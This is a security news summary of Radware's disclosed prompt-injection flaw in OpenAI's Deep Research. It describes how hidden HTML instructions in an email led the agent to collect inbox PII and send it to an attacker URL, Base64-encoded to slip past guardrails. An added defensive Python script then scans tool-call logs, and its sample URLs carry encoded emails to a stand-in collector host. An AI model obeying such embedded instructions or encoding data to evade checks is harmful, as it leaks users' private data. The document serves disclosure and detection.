Overview
- Radware reported the issue on June 18 via Bugcrowd; OpenAI implemented a fix in early August and acknowledged it as resolved on September 3, before public disclosure this week.
- A crafted email hid instructions in HTML that, when processed by Deep Research, coerced the agent to harvest inbox PII and call an attacker URL using the browser.open tool.
- Researchers boosted reliability by Base64‑encoding the extracted data before appending it to the URL, which helped bypass guardrails that flagged direct exfiltration.
- Requests originated from OpenAI’s infrastructure rather than the user’s device, leaving minimal local traces and evading many enterprise monitoring controls.
- The proof of concept targeted Gmail but the technique could apply to other connectors such as Google Drive, Dropbox, Outlook, GitHub, HubSpot, Notion, and SharePoint; Radware says the specific PoC no longer works and there is no public evidence of real‑world abuse.
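
Because the exfiltration request leaves from the agent's side rather than the user's device, the place to catch it is wherever the agent's tool calls are logged or mediated. The following added example (not from Radware or OpenAI) flags outbound URLs whose path segments or query values Base64-decode to text containing an email address. It assumes a hypothetical log format of `browser.open <url>` and uses email addresses as the only PII signal; the hosts and sample data are constructed.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, unquote

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Standard or URL-safe Base64 alphabet, long enough to carry real data.
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{16,}={0,2}$")

def decode_b64_text(token):
    """Return the decoded text if token is Base64 of printable UTF-8, else None."""
    if not B64_RE.match(token):
        return None
    body = token.rstrip("=").replace("+", "-").replace("/", "_")
    try:
        raw = base64.urlsafe_b64decode(body + "=" * (-len(body) % 4))
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    return text if text.isprintable() else None

def url_tokens(url):
    """Yield path segments and query values, the places data gets appended."""
    parts = urlsplit(url)
    for segment in parts.path.split("/"):
        yield unquote(segment)
    for pair in parts.query.split("&"):
        # Split by hand: parse_qsl would turn '+' (valid Base64) into a space.
        yield unquote(pair.partition("=")[2])

def flag_url(url):
    """Return decoded tokens from url that contain an email address."""
    decoded = (decode_b64_text(tok) for tok in url_tokens(url))
    return [text for text in decoded if text and EMAIL_RE.search(text)]

# Constructed sample tool-call log; hosts and the log format are made up.
B64_Q = base64.b64encode(b"jane.doe@example.com").decode()
B64_P = base64.urlsafe_b64encode(b"Jane Doe, jane.doe@example.com").decode().rstrip("=")
SAMPLE_CALLS = [
    f"browser.open https://collector.invalid/lookup?d={B64_Q}",
    f"browser.open https://collector.invalid/hr/{B64_P}",
    "browser.open https://news.example/articles/security-news-2025?ref=weekly",
]

def scan(calls):
    """Return (url, findings) for every logged call whose URL carries encoded PII."""
    urls = (line.split(" ", 1)[1] for line in calls)
    return [(u, hits) for u in urls if (hits := flag_url(u))]

if __name__ == "__main__":
    for url, hits in scan(SAMPLE_CALLS):
        print("ALERT", url, "->", hits)
```

A check like this only sees encodings it knows how to reverse, so it complements an allowlist of destinations the agent may open rather than replacing one.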